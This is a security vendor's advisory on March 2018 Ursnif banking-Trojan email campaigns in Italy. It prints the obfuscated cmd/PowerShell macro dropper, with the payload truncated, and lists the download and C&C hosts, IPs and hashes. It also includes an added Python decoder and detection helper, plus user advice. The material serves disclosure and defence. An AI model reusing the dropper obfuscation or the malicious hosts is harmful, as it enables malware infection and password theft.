16/03/2018
08:24

March 15 and 16, 2018 malspam campaigns spreading Ursnif malware


Italy again under attack by the Ursnif banking Trojan, with the peak of email sending on March 15 and 16, 2018
      
 
 
 

TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email campaign spreading the Ursnif banking Trojan on March 15 and 16, 2018.

Cyber-criminals use social engineering techniques in fraudulent mass mailings to induce the victim to open infected attachments or click on links in the body of the message.

If you received a suspicious email, send it to C.R.A.M. (Anti-Malware Research Center); see the section "How to send suspicious emails for analysis" below.


 

"Ursnif" malware campaign

Malware family: Ursnif
VirIT: Trojan.Win32.Ursnif.EQ, Trojan.DOC.Dropper.OP, Trojan.DOC.Dropper.OM, Trojan.Win32.Ursnif.ER

Description:
The email campaign started on March 15, 2018 and is continuing with a new wave today, March 16.

Subject: [it changes based on the email you receive]

Buongiorno,

Vedi allegato e di confermare.

(Good morning,

See attached and to confirm.)

How it spreads:
It exploits the e-mail accounts configured on the infected PC, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (quoted above), while the subject differs because the mail answers messages received by the victim and therefore varies with them.
The malicious attachment is a DOC file containing an AutoOpen macro that, as soon as it runs, downloads the malware and executes it.
 

The AutoOpen macro first runs CMD.EXE, passing it the following string as a parameter in order to launch PowerShell (2018-03-15 campaign):

 
rhFXZhmvK RmVjRbXZszlijcamdjn lvLlVtdVjfQZil &     %C^om^S^pEc%
%C^om^S^pEc%            /V         /c          
set %EZmZEnibjGMZzfj%=ziJwsjlMVJAGr&&set %XRzNbKzkjXCilL%=p&&
set %zpripnwkZCZkaw%=ow&&
set %PQtilTRmLWujZMD%=GLVwzzR&&
set %OzDuOPYR%=!%XRzNbKzkjXCilL%!&&
set %LBGYnaEvmXjQqSu%=LSCmLPOTU&&
set %LEHbEfzlw%=er&&set %QqLYaunoLaRf%=!%zpripnwkZCZkaw%!&&
set %aPjAIMOMA%=s&&
set %iMOziKsPzidiudM%=bHLpvNh&&set %fWthJZh%=he&&
set %KBZYnMLwWK%=ll&&!%OzDuOPYR%!!
%QqLYaunoLaRf%!!%LEHbEfzlw%!!%aPjAIMOMA%!!%fWthJZh%!!%KBZYnMLwWK%!
"iex(( [rUnTimE.InTErOpSerVIceS.marShal]::
([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe(
[RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d
1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAe
[..]
AAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIA
NAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,
164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,
244,26,241,36,138,128,131)) ) ) )
cmd.exe then runs a PowerShell script:

powershell  "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()  [1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL] [..]
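To show how the set/delayed-expansion chain above resolves to the program name, here is an added analysis helper (not TG Soft's code) that emulates the relevant bits of cmd /V parsing over a truncated copy of the 2018-03-15 command line, with the encrypted PowerShell argument replaced by a placeholder; it also returns simple counters a detection rule could threshold on.

```python
import re
# Constructed sample: the set/delayed-expansion chain from the 2018-03-15 command line
# quoted above, with the long encrypted PowerShell argument replaced by a placeholder.
SAMPLE = (
    "rhFXZhmvK RmVjRbXZszlijcamdjn lvLlVtdVjfQZil & %C^om^S^pEc% %C^om^S^pEc% /V /c "
    "set %EZmZEnibjGMZzfj%=ziJwsjlMVJAGr&&set %XRzNbKzkjXCilL%=p&&"
    "set %zpripnwkZCZkaw%=ow&&set %PQtilTRmLWujZMD%=GLVwzzR&&"
    "set %OzDuOPYR%=!%XRzNbKzkjXCilL%!&&set %LBGYnaEvmXjQqSu%=LSCmLPOTU&&"
    "set %LEHbEfzlw%=er&&set %QqLYaunoLaRf%=!%zpripnwkZCZkaw%!&&"
    "set %aPjAIMOMA%=s&&set %iMOziKsPzidiudM%=bHLpvNh&&set %fWthJZh%=he&&"
    "set %KBZYnMLwWK%=ll&&!%OzDuOPYR%!!%QqLYaunoLaRf%!!%LEHbEfzlw%!"
    "!%aPjAIMOMA%!!%fWthJZh%!!%KBZYnMLwWK%! \"iex(<ENCRYPTED PAYLOAD>)\""
)

DELAYED = re.compile(r"!([^!]+)!")  # !NAME! references, resolved at execution with /V

def expand_delayed(text, env):
    # Replace every !NAME! with the current value of NAME. Names are matched as literal
    # text, percent signs included, exactly as the set commands stored them.
    # Unknown names are left in place so a failed lookup stays visible to the analyst.
    return DELAYED.sub(lambda m: env.get(m.group(1), m.group(0)), text)

def decode_cmd_chain(cmdline):
    """Return (program, env): the program cmd finally starts and the variables it built."""
    # cmd strips escape carets before a token is used, so %C^om^S^pEc% is %ComSpec%.
    cmdline = cmdline.replace("^", "")
    _, _, body = cmdline.partition(" /c ")  # only the part after /c is executed
    env, program = {}, None
    for cmd in body.split("&&"):
        cmd = cmd.strip()
        if cmd.lower().startswith("set "):
            name, _, value = cmd[4:].partition("=")
            # With /V, !NAME! inside the value is expanded when this set executes,
            # which lets the chain copy an earlier fragment into a new variable.
            env[name] = expand_delayed(value, env)
        else:
            # The last element is the real invocation; its first word is the program.
            program = expand_delayed(cmd, env).split(" ", 1)[0]
    return program, env

def indicators(cmdline):
    """Cheap triage counters an analyst or detection rule can threshold on."""
    return {
        "carets": cmdline.count("^"),
        "set_commands": len(re.findall(r"(?i)\bset\s", cmdline)),
        "delayed_refs": len(DELAYED.findall(cmdline.replace("^", ""))),
    }

if __name__ == "__main__":
    print(decode_cmd_chain(SAMPLE)[0], indicators(SAMPLE))
```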

The PowerShell script downloads Ursnif from the site http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker2.class and sets it to run automatically.
 
Once started, the malware creates a value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run with [random value] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[RANDOM FOLDER]\FILENAME.EXE
The Ursnif malware then injects itself into the EXPLORER.EXE process.

Example:
Name: 5935890.exe
MD5: A54E54EF024C4D75107EC3B678D92DF3
Size: 439,808 bytes
Compilation date: 14/03/2018 20:39:36


In the March 16 campaign, the Trojan Banker Ursnif is downloaded from the site http://krqweugmjasndasidhnjqwewq[.]com.
 

Note:
The downloaded malware belongs to the Ursnif family; its peculiarity is stealing login passwords for important sites such as home banking, mail, FTP, etc.

IOC 2018-03-15:
 
File DOC MD5:


File EXE MD5:


URL:
IP: 
138.128.5.85

Server C&C (Where exfiltrated data such as passwords and clipboard logs are sent):
https://ijquhgaspwqeasuahdqwe.net

IP server C&C: 138.128.5.96




IOC 2018-03-16 (in progress...):
 
File DOC MD5:


File EXE MD5:
A51E01AEA30DE8B559438D2CFC051AF0


URL:


 


 


How to identify a fake email

Experience and common sense are the first weapons against these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of ZIP-formatted attachments and, if possible, DO NOT enable automatic macro execution. Setting macros to run automatically is strongly discouraged, since simply opening a Word or Excel file would then execute its macros immediately, without any prior alert.
If you have been infected by a banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions even after the remediation of the system(s) involved, such as changing the passwords you use most on the Web. If the workstation involved is used for home-banking transactions, a check with your bank is also recommended.

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts

Sending material to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
  1. Any suspect email can be sent directly from the recipient's e-mail client to lite@virit.com, choosing "Forward as Attachment" as the sending mode and putting "Possible phishing page to verify" or "Possible Malware to verify" in the subject;
  2. Save the e-mail to be analysed by TG Soft's C.R.A.M. as a file external to the e-mail program in use. The resulting file must then be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis of the submitted data, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possible / probable phishing; possible / probable malware; or other).
All this is to help prevent you from running into credential theft, viruses/malware or, even worse, next-generation Ransomware / Crypto-Malware.
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, it is advisable to install Vir.IT eXplorer Lite (FREE Edition) alongside the antivirus in use, to increase the security of your computers, PCs and SERVERs alike.

Vir.IT eXplorer Lite
has the following special features:
  • freely usable in both private and corporate environments, with Engine+Signature updates without time limitation;
  • interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security product already present on PCs and SERVERs. We recommend using it as a supplement to the AntiVirus already in use: it does not conflict with it or slow down the system, but significantly increases security in terms of identification and remediation of infected files;
  • it identifies and, in many cases, also removes most of the viruses/malware currently circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.IT eXplorer PRO;
  • through the Intrusion Detection technology, also available in the Lite version of Vir.IT eXplorer, the software is able to report new-generation viruses/malware that have set themselves to run automatically and to send the reported files to TG Soft's C.R.A.M.;
  • proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

 

For Vir.IT eXplorer PRO owners, it is also possible to contact TG Soft's technical phone support free of charge. The details can be found on the CLIENTS support page.
 


C.R.A.M.

TG Soft's Anti-Malware Research Center

 



